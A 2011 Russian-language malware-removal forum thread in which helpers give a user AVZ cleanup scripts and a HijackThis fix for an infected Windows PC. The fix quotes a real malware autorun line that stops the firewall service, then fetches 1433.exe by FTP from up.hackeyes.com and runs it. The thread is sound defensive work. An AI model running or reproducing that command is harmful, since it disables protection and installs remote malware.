Это логи после лечения AVZ . У меня есть предположение чьто после лечения остались коекакие хвосты. Помогите пожалуйста разобратся. Да ищё в диспечере устройств новое неопознаное устройство ROOT\LEGACY_UZE4ODKX\0000
Это логи после лечения AVZ . У меня есть предположение чьто после лечения остались коекакие хвосты. Помогите пожалуйста разобратся. Да ищё в диспечере устройств новое неопознаное устройство ROOT\LEGACY_UZE4ODKX\0000
Последний раз редактировалось olejah; 22.06.2011 в 16:18. Причина: Карантин в теме.
Уважаемый(ая) unforgiven101077, спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Здравствуйте.
Отключите:
-ПК от интернета
-Все защитные приложения
Выполните скрипт в AVZ:
Компьютер перезагрузится.Код:begin SearchRootkit(true, true); SetAVZGuardStatus(true); TerminateProcessByName('c:\cashwriter\cash.exe'); QuarantineFile('c:\windows\aq.bat',''); QuarantineFile('c:\cashwriter\cash.exe',''); QuarantineFile('C:\WINDOWS\System32\tcpwakvlib.exe',''); QuarantineFile('C:\WINDOWS\V2011.exe',''); DeleteFile('c:\windows\aq.bat'); DeleteFile('C:\WINDOWS\System32\tcpwakvlib.exe'); RegKeyParamWrite('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Command Processor', 'AutoRun', 'REG_SZ', ''); BC_ImportAll; ExecuteSysClean; BC_DeleteSvc('WakvSvc'); ExecuteRepair(9); ExecuteWizard('TSW',2,3,true); BC_Activate; RebootWindows(true); end.
Затем выполните ещё один скрипт:
И пришлите quarantine.zip из папки AVZ согласно правилам (через красную ссылку "Прислать запрошенный карантин" наверху темы).Код:begin CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); end.
Сделайте повторные логи.
Сделайте лог MBAM.
ВЫсылаю повторные логи , проблема с ROOT\LEGACY_UZE4ODKX\0000 пока сохранилась и ищё при запуке появилось ищё какоето окно с 1433.ехе в вложеной картинке окно после перезапуска системы после выполнения скрипта AVZ
Пофиксите в HijackThis:
Выполните скрипт в AVZ:Код:O4 - HKLM\..\Run: [shell] c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open up.hackeyes.com > cmd.txt&echo 110>> cmd.txt&echo 110>> cmd.txt&echo binary >> cmd.txt&echo get 1433.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1433.exe&1433.exe&del cmd.t
Сделайте повторные логи.Код:begin SearchRootkit(true, true); SetAVZGuardStatus(true); DeleteFile('C:\WINDOWS\V2011.exe'); RegKeyParamDel('HKEY_USERS','.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run','V2011'); RegKeyParamDel('HKEY_USERS','S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run','V2011'); BC_ImportAll; ExecuteSysClean; ExecuteWizard('TSW',2,3,true); BC_Activate; RebootWindows(true); end.
Вот повторные логи, осталась только проблема с новым оборудыванием
Чисто.
Попытайтесь удалить новое оборудование.
Спасибо щас попробую удалить новое оборудование
Добавлено через 8 минут
Большое спасибо всё работает нормально тему можно закрывать
Последний раз редактировалось unforgiven101077; 23.06.2011 в 13:26. Причина: Добавлено
Уважаемый(ая) unforgiven101077, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.